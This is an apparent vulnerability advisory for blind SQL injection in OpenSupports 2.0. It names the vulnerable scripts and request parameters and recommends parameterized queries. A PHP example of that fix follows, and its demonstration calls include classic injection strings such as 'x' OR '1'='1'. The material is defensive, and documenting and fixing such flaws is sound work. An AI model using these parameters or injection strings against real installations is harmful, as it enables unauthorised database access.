vendor: OpenSupports
by: indoushka
CVSS: 7.5 HIGH
Blind SQL Injection
CWE: 89
Product Name: OpenSupports
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: NO
Related CWE: N/A
CPE: a:opensupports:opensupports:2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2014
Open Support Blind SQL Injection v2.0 Vulnerability
This vulnerability affects /support/login.php, /support/responder.php and /support/verarticulo.php. In each script, an attacker can inject malicious SQL queries through request parameters that the application passes into its queries. In /support/login.php, the vulnerable parameter is emailcorreoelectronico. In /support/responder.php, the vulnerable parameters are idarticulo and text_content. In /support/verarticulo.php, the vulnerable parameter is id.
Mitigation:
The application should use parameterized queries to prevent SQL injection attacks.
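
The mitigation applied to the parameters named in this advisory, as an added example (not OpenSupports code). The table and column names and the helper functions are hypothetical, and an in-memory SQLite database stands in for the application's database.

```php
<?php
// Added example, not OpenSupports code. Tables, columns and function names are
// hypothetical; only the request parameter names come from the advisory.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT UNIQUE)');
$pdo->exec('CREATE TABLE articles (id INTEGER PRIMARY KEY, body TEXT)');
$pdo->exec('CREATE TABLE replies (idarticulo INTEGER, text_content TEXT)');
$pdo->exec("INSERT INTO users (email) VALUES ('staff@example.test')");
$pdo->exec("INSERT INTO articles (id, body) VALUES (1, 'How to reset a password')");

// Strict check for id / idarticulo: anything but a positive integer is rejected.
function positiveInt($value): ?int {
    $n = filter_var($value, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $n === false ? null : $n;
}

// login.php: emailcorreoelectronico is bound as a value, never concatenated.
function findUser(PDO $pdo, string $email): ?array {
    $stmt = $pdo->prepare('SELECT id, email FROM users WHERE email = :email');
    $stmt->execute([':email' => $email]);
    return $stmt->fetch(PDO::FETCH_ASSOC) ?: null;
}

// verarticulo.php: id is validated, then bound with an explicit integer type.
function findArticle(PDO $pdo, $id): ?array {
    if (($n = positiveInt($id)) === null) { return null; }
    $stmt = $pdo->prepare('SELECT id, body FROM articles WHERE id = :id');
    $stmt->bindValue(':id', $n, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetch(PDO::FETCH_ASSOC) ?: null;
}

// responder.php: idarticulo is validated; text_content is stored verbatim as data.
function addReply(PDO $pdo, $idarticulo, string $text): bool {
    if (($n = positiveInt($idarticulo)) === null) { return false; }
    $stmt = $pdo->prepare('INSERT INTO replies (idarticulo, text_content) VALUES (:a, :t)');
    return $stmt->execute([':a' => $n, ':t' => $text]);
}

// Constructed inputs: SQL metacharacters reach the database only as literal data.
var_dump(findUser($pdo, 'staff@example.test') !== null);
var_dump(findUser($pdo, "x' OR '1'='1"));
var_dump(findArticle($pdo, '1 AND 1=1'));
var_dump(addReply($pdo, '1', "it's a reply; -- not a comment"));
```

With a MySQL backend, also set PDO::ATTR_EMULATE_PREPARES to false so the values are bound by the server rather than interpolated client-side.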